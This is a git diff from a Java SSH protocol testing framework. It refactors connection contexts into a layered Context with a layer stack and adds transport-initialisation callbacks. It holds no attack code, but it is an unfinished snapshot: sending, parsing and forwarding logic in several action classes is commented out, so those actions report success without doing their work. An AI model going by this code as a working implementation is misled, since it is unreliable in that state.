boolean isDisconnectMessageReceived() { + return disconnectMessageReceived; + } + + public void setDisconnectMessageReceived(Boolean disconnectMessageReceived) { + this.disconnectMessageReceived = disconnectMessageReceived; + } + + public boolean isVersionExchangeComplete() { + return versionExchangeCompleted; + } + + public void setVersionExchangeComplete(Boolean complete) { + this.versionExchangeCompleted = complete; + } + + public boolean isClient() { + return connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT; + } + + public boolean isServer() { + return connection.getLocalConnectionEndType() == ConnectionEndType.SERVER; + } + + public boolean isHandleAsClient() { + return handleAsClient; + } + + public void setHandleAsClient(boolean handleAsClient) { + this.handleAsClient = handleAsClient; + } + + +}*/ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java index 1266bd4c7..7df0a5d45 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java @@ -12,6 +12,9 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.RunningModeType; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.layer.LayerStack; +import de.rub.nds.sshattacker.core.layer.LayerStackFactory; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.WorkflowTraceNormalizer; import de.rub.nds.sshattacker.core.workflow.WorkflowTraceSerializer; @@ -98,8 +101,11 @@ public final void initState() { normalizer.normalize(workflowTrace, config, runningMode); for (AliasedConnection con : workflowTrace.getConnections()) { - SshContext ctx = new SshContext(config, con); - addSshContext(ctx); + Context ctx = new Context(config, con); + LayerStack layerStack = + LayerStackFactory.createLayerStack(config.getDefaultLayerConfiguration(), ctx); + ctx.setLayerStack(layerStack); + addContext(ctx); } } @@ -152,10 +158,10 @@ public WorkflowTrace getOriginalWorkflowTrace() { * Replace existing SshContext with new SshContext. This can only be done if * existingSshContext.connection equals newSshContext.connection. * - * @param newSshContext The new SshContext to replace the old with + * @param Context The new SshContext to replace the old with */ - public void replaceSshContext(SshContext newSshContext) { - contextContainer.replaceSshContext(newSshContext); + public void replaceContext(Context newContext) { + contextContainer.replaceContext(newContext); } /** @@ -170,8 +176,8 @@ public void replaceSshContext(SshContext newSshContext) { * * @return the only context known to the state */ - public SshContext getSshContext() { - return contextContainer.getSshContext(); + public Context getContext() { + return contextContainer.getContext(); } /** @@ -186,20 +192,28 @@ public SshContext getSshContext() { * @param alias The Alias for which the SshContext should be returned * @return the context with the given connection end alias */ - public SshContext getSshContext(String alias) { + public Context getContext(String alias) { return contextContainer.getSshContext(alias); } - public List getAllSshContexts() { + public SshContext getSshContext() { + return getContext().getSshContext(); + } + + public SshContext getSshContext(String alias) { + return getContext(alias).getSshContext(); + } + + public List getAllContexts() { return contextContainer.getAllContexts(); } - public List getInboundSshContexts() { - return contextContainer.getInboundSshContexts(); + public List getInboundContexts() { + return contextContainer.getInboundContexts(); } - public List getOutboundSshContexts() { - return contextContainer.getOutboundSshContexts(); + public List getOutboundContexts() { + return contextContainer.getOutboundContexts(); } public RunningModeType getRunningMode() { @@ -210,8 +224,8 @@ public void setRunningMode(RunningModeType runningMode) { this.runningMode = runningMode; } - private void addSshContext(SshContext context) { - contextContainer.addSshContext(context); + private void addContext(Context context) { + contextContainer.addContext(context); } /** diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java index b8a5381a5..1bc6a60e4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java @@ -10,7 +10,7 @@ import de.rub.nds.sshattacker.core.config.ConfigIO; import de.rub.nds.sshattacker.core.exceptions.PreparationException; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.action.SshAction; import de.rub.nds.sshattacker.core.workflow.action.executor.WorkflowExecutorType; @@ -31,12 +31,12 @@ public DefaultWorkflowExecutor(State state) { @Override public void executeWorkflow() throws WorkflowExecutionException { if (config.getWorkflowExecutorShouldOpen()) { - state.getAllSshContexts() - .forEach( - ctx -> { - ctx.initTransportHandler(); - LOGGER.debug("Connection for " + ctx + " initialized"); - }); + try { + initAllLayer(); + } catch (IOException ex) { + throw new WorkflowExecutionException( + "Workflow not executed, could not initialize transport handler: ", ex); + } } state.getWorkflowTrace().reset(); @@ -67,7 +67,7 @@ && isDisconnectMessageReceived())) { } } - if (state.getConfig().getWorkflowExecutorShouldClose()) { + /* if (state.getConfig().getWorkflowExecutorShouldClose()) { state.getAllSshContexts() .forEach( ctx -> { @@ -78,7 +78,7 @@ && isDisconnectMessageReceived())) { LOGGER.debug(ex); } }); - } + }*/ if (state.getConfig().getResetWorkflowtracesBeforeSaving()) { state.getWorkflowTrace().reset(); @@ -91,11 +91,20 @@ && isDisconnectMessageReceived())) { } private boolean isDisconnectMessageReceived() { - return state.getAllSshContexts().stream().anyMatch(SshContext::isDisconnectMessageReceived); + for (Context context : state.getAllContexts()) { + if (context.getSshContext().isDisconnectMessageReceived()) { + return true; + } + } + return false; } - private boolean isIoException() { - return state.getAllSshContexts().stream() - .anyMatch(SshContext::hasReceivedTransportHandlerException); + public boolean isIoException() { + for (Context context : state.getAllContexts()) { + if (context.getSshContext().hasReceivedTransportHandlerException()) { + return true; + } + } + return false; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index e77d5a191..c79dfc1fb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -8,9 +8,16 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.exceptions.TransportHandlerConnectException; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.LayerStackFactory; +import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.action.executor.WorkflowExecutorType; +import de.rub.nds.tlsattacker.transport.TransportHandlerFactory; +import java.io.IOException; +import java.util.function.Function; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,6 +29,47 @@ public abstract class WorkflowExecutor { protected final State state; protected final Config config; + private Function beforeTransportPreInitCallback = null; + + private Function beforeTransportInitCallback = null; + + public Function getBeforeTransportPreInitCallback() { + return beforeTransportPreInitCallback; + } + + public void setBeforeTransportPreInitCallback( + Function beforeTransportPreInitCallback) { + this.beforeTransportPreInitCallback = beforeTransportPreInitCallback; + } + + public Function getBeforeTransportInitCallback() { + return beforeTransportInitCallback; + } + + public void setBeforeTransportInitCallback( + Function beforeTransportInitCallback) { + this.beforeTransportInitCallback = beforeTransportInitCallback; + } + + public Function getAfterTransportInitCallback() { + return afterTransportInitCallback; + } + + public void setAfterTransportInitCallback(Function afterTransportInitCallback) { + this.afterTransportInitCallback = afterTransportInitCallback; + } + + public Function getAfterExecutionCallback() { + return afterExecutionCallback; + } + + public void setAfterExecutionCallback(Function afterExecutionCallback) { + this.afterExecutionCallback = afterExecutionCallback; + } + + private Function afterTransportInitCallback = null; + + private Function afterExecutionCallback = null; /** * Prepare a workflow trace for execution according to the given state and executor type. Try @@ -39,4 +87,56 @@ public WorkflowExecutor(WorkflowExecutorType type, State state) { } public abstract void executeWorkflow() throws WorkflowExecutionException; + + public void initProtocolStack(Context context) throws IOException { + context.setLayerStack( + LayerStackFactory.createLayerStack(config.getDefaultLayerConfiguration(), context)); + } + + public void initAllLayer() throws IOException { + for (Context ctx : state.getAllContexts()) { + initTransportHandler(ctx); + initProtocolStack(ctx); + } + } + + public void initTransportHandler(Context context) { + + if (context.getTransportHandler() == null) { + if (context.getConnection() == null) { + throw new ConfigurationException("Connection end not set"); + } + context.setTransportHandler( + TransportHandlerFactory.createTransportHandler(context.getConnection())); + /*context.getTransportHandler() + .setResetClientSourcePort(config.isResetClientSourcePort()); + if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { + ((ClientTcpTransportHandler) context.getTransportHandler()) + .setRetryFailedSocketInitialization( + config.isRetryFailedClientTcpSocketInitialization()); + }*/ + } + + try { + if (getBeforeTransportPreInitCallback() != null) { + getBeforeTransportPreInitCallback().apply(state); + } + context.getTransportHandler().preInitialize(); + if (getBeforeTransportInitCallback() != null) { + getBeforeTransportInitCallback().apply(state); + } + context.getTransportHandler().initialize(); + if (getAfterTransportInitCallback() != null) { + getAfterTransportInitCallback().apply(state); + } + } catch (NullPointerException | NumberFormatException ex) { + throw new ConfigurationException( + "Invalid values in " + context.getConnection().toString(), ex); + } catch (Exception ex) { + throw new TransportHandlerConnectException( + "Unable to initialize the transport handler with: " + + context.getConnection().toString(), + ex); + } + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java index 059e6af30..ab61aa369 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java @@ -8,7 +8,7 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.connection.AliasedConnection; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.tlsattacker.transport.tcp.ServerTcpTransportHandler; import java.io.IOException; @@ -52,7 +52,8 @@ public void run() { State state = new State(globalState.getConfig(), localTrace); // Do this post state init only if you know what yout are doing. - SshContext serverCtx = state.getInboundSshContexts().get(0); + + SshContext serverCtx = state.getInboundContexts().get(0).getSshContext(); AliasedConnection serverCon = serverCtx.getConnection(); serverCon.setHostname(socket.getInetAddress().getHostAddress()); serverCon.setPort(socket.getLocalPort()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceSerializer.java index 92a803e78..15c4e4dad 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceSerializer.java @@ -126,6 +126,7 @@ public static WorkflowTrace insecureRead(InputStream inputStream) xif.setProperty(XMLInputFactory.SUPPORT_DTD, false); XMLStreamReader xsr = xif.createXMLStreamReader(inputStream); WorkflowTrace wt = (WorkflowTrace) unmarshaller.unmarshal(xsr); + LOGGER.debug(wt.toString()); inputStream.close(); return wt; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java index 66f1d4779..08bf6d6f7 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ActivateEncryptionAction.java @@ -12,9 +12,9 @@ import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; import de.rub.nds.sshattacker.core.constants.MacAlgorithm; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.util.Optional; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangeCompressionAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangeCompressionAction.java index 1e020c03c..e3fed08b6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangeCompressionAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangeCompressionAction.java @@ -10,7 +10,7 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.state.State; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java index e77ef876d..d5aa63ef8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java @@ -10,8 +10,8 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlAttribute; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DeactivateEncryptionAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DeactivateEncryptionAction.java index 23c3f70ec..cf4fa98b0 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DeactivateEncryptionAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DeactivateEncryptionAction.java @@ -10,8 +10,8 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; public class DeactivateEncryptionAction extends ConnectionBoundAction { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java index 17ef76459..65d4a3870 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java @@ -10,7 +10,7 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; import java.util.ArrayList; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index 3cbf6e814..bf91a3070 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -9,11 +9,11 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; @@ -175,7 +175,7 @@ protected void applyMessages(SshContext ctx) { for (ProtocolMessage msg : receivedMessages) { LOGGER.debug("Applying " + msg.toCompactString() + " to forward context " + ctx); ProtocolMessageHandler h = msg.getHandler(ctx); - h.adjustContext(); + // h.adjustContext(); } changeSshContextHandling(ctx); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java index e70babfe5..2e0bfd0ca 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java @@ -8,14 +8,13 @@ package de.rub.nds.sshattacker.core.workflow.action; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthHostbasedMessage; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthPubkeyMessage; import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthHostbasedMessagePreparator; import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPubkeyMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; import jakarta.xml.bind.annotation.XmlTransient; @@ -84,13 +83,13 @@ protected void forwardMessages(SshContext forwardToCtx) { + forwardToAlias + "): " + getReadableString(receivedMessages)); - MessageActionResult result = + /*MessageActionResult result = sendMessageHelper.sendMessages(forwardToCtx, filteredMessages.stream()); sendMessages = result.getMessageList(); if (executedAsPlanned) { executedAsPlanned = checkMessageListsEquals(sendMessages, messages); - } + }*/ setExecuted(true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index a9261400d..a4fec0596 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -10,11 +10,11 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; import jakarta.xml.bind.annotation.XmlElement; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java index b45b04641..df47f3c0e 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java @@ -10,11 +10,10 @@ import de.rub.nds.modifiablevariable.ModifiableVariable; import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.executor.MessageActionResult; import jakarta.xml.bind.annotation.XmlElement; import java.lang.reflect.Field; import java.util.Arrays; @@ -100,7 +99,7 @@ public void execute(State state) throws WorkflowExecutionException { LOGGER.info("Sending messages (" + connectionAlias + "): " + sending); } - messages.forEach(message -> message.getHandler(context).getPreparator().prepare()); + /*messages.forEach(message -> message.getHandler(context).getPreparator().prepare()); final MessageActionResult result = sendMessageHelper.sendMessages(context, messages.stream()); @@ -111,7 +110,7 @@ public void execute(State state) throws WorkflowExecutionException { if (this.isFailed()) { LOGGER.error( "Failed to send {} out of {} message(s)!", failedMessageCount, messages.size()); - } + }*/ setExecuted(true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java index 09495abac..e6b7a3ef4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java @@ -11,11 +11,11 @@ import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerParseResult; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import java.io.IOException; import java.util.ArrayList; import java.util.LinkedList; @@ -134,10 +134,10 @@ public MessageActionResult handleReceivedBytes(SshContext context, byte[] receiv PacketLayerParseResult parseResult = parsePacket(context, receivedBytes, dataPointer); Optional parsedPacket = parseResult.getParsedPacket(); if (parsedPacket.isPresent()) { - ProtocolMessage message = context.getMessageLayer().parse(parsedPacket.get()); + /*ProtocolMessage message = context.getMessageLayer().parse(parsedPacket.get()); message.getHandler(context).adjustContext(); retrievedPackets.add(parsedPacket.get()); - parsedMessages.add(message); + parsedMessages.add(message);*/ } dataPointer += parseResult.getParsedByteCount(); } while (dataPointer < receivedBytes.length); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java index 84b032873..5988f632f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java @@ -7,17 +7,11 @@ */ package de.rub.nds.sshattacker.core.workflow.action.executor; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import de.rub.nds.sshattacker.core.protocol.common.Handler; -import de.rub.nds.sshattacker.core.protocol.common.MessageSentHandler; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.tlsattacker.transport.TransportHandler; import java.io.IOException; -import java.util.Collections; -import java.util.stream.Stream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,16 +25,16 @@ public void sendPacket(SshContext context, AbstractPacket packet) throws IOExcep transportHandler.sendData(packetLayer.preparePacket(packet)); } - public MessageActionResult sendMessage(SshContext context, ProtocolMessage message) { - MessageLayer messageLayer = context.getMessageLayer(); - try { - AbstractPacket packet = messageLayer.serialize(message); - sendPacket(context, packet); - Handler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - return new MessageActionResult( + /*public MessageActionResult sendMessage(SshContext context, ProtocolMessage message) { + MessageLayer messageLayer = context.getMessageLayer(); + try { + AbstractPacket packet = messageLayer.serialize(message); + sendPacket(context, packet); + Handler handler = message.getHandler(context); + if (handler instanceof MessageSentHandler) { + ((MessageSentHandler) handler).adjustContextAfterMessageSent(); + } + return new MessageActionResult( Collections.singletonList(packet), Collections.singletonList(message)); } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); @@ -54,5 +48,5 @@ public MessageActionResult sendMessages( .map(message -> sendMessage(context, message)) .reduce(MessageActionResult::merge) .orElse(new MessageActionResult()); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java index a54a29a65..196cc1432 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java @@ -16,7 +16,9 @@ import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.state.Context; +import de.rub.nds.tlsattacker.transport.Connection; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; import java.util.List; import java.util.stream.Stream; import org.apache.logging.log4j.LogManager; @@ -26,11 +28,11 @@ public abstract class Chooser { private static final Logger LOGGER = LogManager.getLogger(); - protected final SshContext context; + protected final Context context; protected final Config config; - public Chooser(SshContext context, Config config) { + public Chooser(Context context, Config config) { this.config = config; this.context = context; } @@ -39,7 +41,7 @@ public Config getConfig() { return config; } - public SshContext getContext() { + public Context getContext() { return context; } @@ -128,7 +130,7 @@ public SshContext getContext() { * @return The negotiated encryption algorithm for outgoing packets. */ public EncryptionAlgorithm getSendEncryptionAlgorithm() { - return context.isClient() + return context.getSshContext().isClient() ? this.getEncryptionAlgorithmClientToServer() : this.getEncryptionAlgorithmServerToClient(); } @@ -141,7 +143,7 @@ public EncryptionAlgorithm getSendEncryptionAlgorithm() { * @return The negotiated encryption algorithm for incoming packets. */ public EncryptionAlgorithm getReceiveEncryptionAlgorithm() { - return context.isClient() + return context.getSshContext().isClient() ? this.getEncryptionAlgorithmServerToClient() : this.getEncryptionAlgorithmClientToServer(); } @@ -158,7 +160,7 @@ public EncryptionAlgorithm getReceiveEncryptionAlgorithm() { * @return The negotiated MAC algorithm for outgoing packets. */ public MacAlgorithm getSendMacAlgorithm() { - return context.isClient() + return context.getSshContext().isClient() ? this.getMacAlgorithmClientToServer() : this.getMacAlgorithmServerToClient(); } @@ -171,7 +173,7 @@ public MacAlgorithm getSendMacAlgorithm() { * @return The negotiated MAC algorithm for incoming packets. */ public MacAlgorithm getReceiveMacAlgorithm() { - return context.isClient() + return context.getSshContext().isClient() ? this.getMacAlgorithmServerToClient() : this.getMacAlgorithmClientToServer(); } @@ -188,7 +190,7 @@ public MacAlgorithm getReceiveMacAlgorithm() { * @return The negotiated compression method for outgoing packets. */ public CompressionMethod getSendCompressionMethod() { - return context.isClient() + return context.getSshContext().isClient() ? this.getCompressionMethodClientToServer() : this.getCompressionMethodServerToClient(); } @@ -201,7 +203,7 @@ public CompressionMethod getSendCompressionMethod() { * @return The negotiated compression method for incoming packets. */ public CompressionMethod getReceiveCompressionMethod() { - return context.isClient() + return context.getSshContext().isClient() ? this.getCompressionMethodServerToClient() : this.getCompressionMethodClientToServer(); } @@ -235,4 +237,16 @@ public CompressionMethod getReceiveCompressionMethod() { // endregion public abstract AuthenticationMethod getAuthenticationMethod(); + + public abstract ConnectionEndType getConnectionEndType(); + + public abstract Connection getConnection(); + + public abstract CompressionAlgorithm getSelectedCompressionAlgorithm(); + + public abstract EncryptionAlgorithm getSelectedEncryptionAlgorithm(); + + public abstract MacAlgorithm getSelectedMacAlgorithm(); + + public abstract KeyExchangeAlgorithm getSelectedKeyExchangeAlgorithm(); } diff --git 